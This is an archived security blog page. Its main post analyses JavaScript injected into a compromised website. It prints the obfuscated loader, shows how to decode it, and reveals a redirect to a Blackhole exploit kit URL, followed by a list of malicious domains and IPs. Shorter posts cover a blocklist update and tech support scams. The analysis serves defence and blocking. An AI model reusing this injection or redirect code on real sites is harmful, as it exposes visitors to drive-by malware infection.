Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 2 October 2012

Blackhole exploit: Compromised sites

Looking at a recent case of a compromised site, I noticed something rather surprising - they're not even bothering to try and make the code difficult to decode. I'm pondering of course, the thought that this is deliberate, due to the changes in v2.0 of the Blackhole exploit (others have already written about that [1] [2], so won't go into that here), but even if this is the case, the choice of using far less complex code on compromised sites, is puzzling to say the least.

In this case, the code inserted into the compromised site is (I've formatted it for readability)

v="v"+"a"+"l";
try
{
        faweb++
}
catch(btawetb)
{
        try
        {
                sbgesrb+325
        }
        catch(btawt4)
        {
                w=window;
                e=w["e"+v];
        }
}
if(1)
{
        f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
        j=i;
        if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
        gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}


To decode this, all you need to do, is modify it as follows;

v="v"+"a"+"l";
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
    j=i;
    s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);


Which gives us (I've disabled the URL, to prevent those that have links auto-hyperlinked);

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}


In this case, onlinebayunator.ru is residing at;

70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

Other domains known to have (most are now thankfully, dead) or are, living on the IPs include;

adventiste.pf
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru


hpHosts, Malware Domain List, Malwarebytes AntiMalware users will be pleased to know, the IPs/domains are already blocked.

Incidentally, onlinebayunator.ru was resolving to following yesterday (1st October), and nope, I'm not surprised to see CB3ROB' IP space making an appearance either;

84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

References

Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0

Malzilla (open source)
http://malzilla.sourceforge.net

Next hpHosts release, VB2012

As some of you know, I've been in the US for VB2012 and to visit the chaps and chapesses at the Malwarebytes HQ since September 24th, got back around mid-day on the 30th.

First and foremost, I'd like to say thank you to those involved in VB2012, as it was fantastic. Indeed, the only things I didn't like, were the bleedin heat (felt like I was melting), and the lack of both wifi and plug sockets on the planes (had never been out of the UK before, and was terrified of flying (still am - it's not normal!!)).

I also got to meet a living legend in Dallas - Alex Eckelberry, and Marcelo Rivero, amongst a plethora of others (I'm rubbish with names, so embarrasingly, can't remember the names of half of them).

The presentation I went to Dallas to do with David Harley (Eset), Martijn Grooten (Virus Bulletin) and Craig Johnston (Independent researcher, formerly Sophos), went well, despite the nerves getting the better of me (was not only my first flight, but my first presentation too).

On the subject of the presentation, one of the things we focused on, despite what the telephony scam was all about (for those that didn't already know), but also what could be done about it, and this included asking for more involvement, not only from the banks/financial institutions, law enforcement etc, but also from you - the security community, and most importantly, the public. If you'd like to get involved, please contact either myself, David, Craig or Martijn. The more help we can get, the better.

Due to being away, the hpHosts release was delayed, it is now due to be published on October 5th. As always, the partial update is available for those that would like to use it. The easiest method of doing this, is via programs such as HostsMan.

Friday, 31 August 2012

hphosts: Updated 01-09-2012

The hpHOSTS Hosts file has been updated. There is now a total of 169,808 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 01/09/2012 03:45
  2. Last Verified: 01/09/2012 00:00
Download hpHosts now!
http://hosts-file.net/?s=Download

Friday, 24 August 2012

Info: Ammyy now warning about telephony scams

I am happy to report, Ammyy, the remote software firm, are now warning about the on-going telephony scams.

When a support scammer tries to get you to hand over your credit card details in exchange for a fraudulent virus removal and system protection ‘service’, an important part of the scam involves persuading you to give them remote access to your system. They do this partly to convince you that there is a problem with your system, and partly to ‘help you’ by installing the software you’re paying them for. The software is often legitimate, but it’s also usually stuff you could get for free elsewhere, and usually has very little to do with protecting you from imaginary viruses. According to reports from the UK, the scammers often use the logmein.com remote access service (I see reports of Team Viewer being used, too), but in the US, they make use – more often than not – of ammyy.com, a service apparently operating out of Seattle. In fact, the scam is often referred to in the US as the ammyy scam, though I haven’t seen much in the way of serious suggestions that Ammyy LLC is directly implicated in the fraudulent use of its service.


Read David's writeup here;

http://blog.eset.com/2012/08/24/ammyy-warning-against-tech-support-scams

Hat tip to Martijn Grooten (Virus Bulletin) for the heads up!

Saturday, 18 August 2012

Email issues

Seems to be one thing or another lately, but there appears to be an issue with the mailbox for it-mate.co.uk, housed by Domain Monster. This issue is of an unknown cause at present, and because Domain Monster both don't work 24/7, and are unreachable on Sundays, won't be identified until Monday (assuming it doesn't resolve itself before then). Suffice to say, the issue present prevents my receiving emails. I can still be reached on the Malwarebytes address however, or via the hpHosts, TeMerc, BotScout, Malwarebytes, Malware Domain List or Avant Browser forums (username is the same for all of them - MysteryFCM).